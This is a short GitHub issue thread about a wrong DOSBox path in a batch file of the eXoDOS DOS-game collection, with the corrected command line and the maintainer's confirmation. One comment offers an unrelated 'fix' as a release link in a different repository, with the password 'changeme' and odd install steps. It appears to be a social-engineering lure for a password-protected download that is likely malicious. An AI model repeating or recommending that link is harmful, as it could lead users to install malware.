### ISSUE TITLE
Another Lifeless Planet and Me With No Beer (1991)

### ISSUE THREAD

**Issue by parricc** [exoscoriae/eXoDOS#5374]
`Extras\Compu-Nerd (Pack-in program).bat` has an outdated and now incorrect path to DOSBox.
`".\dosbox\dosbox.exe" -conf "%var%\dosbox2.conf" -noconsole -exit`
should be:
`".\emulators\dosbox\DOSBox.exe" -conf "%var%\dosbox2.conf" -noconsole -exit`

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by exoscoriae** [comment]
thank you. fixed
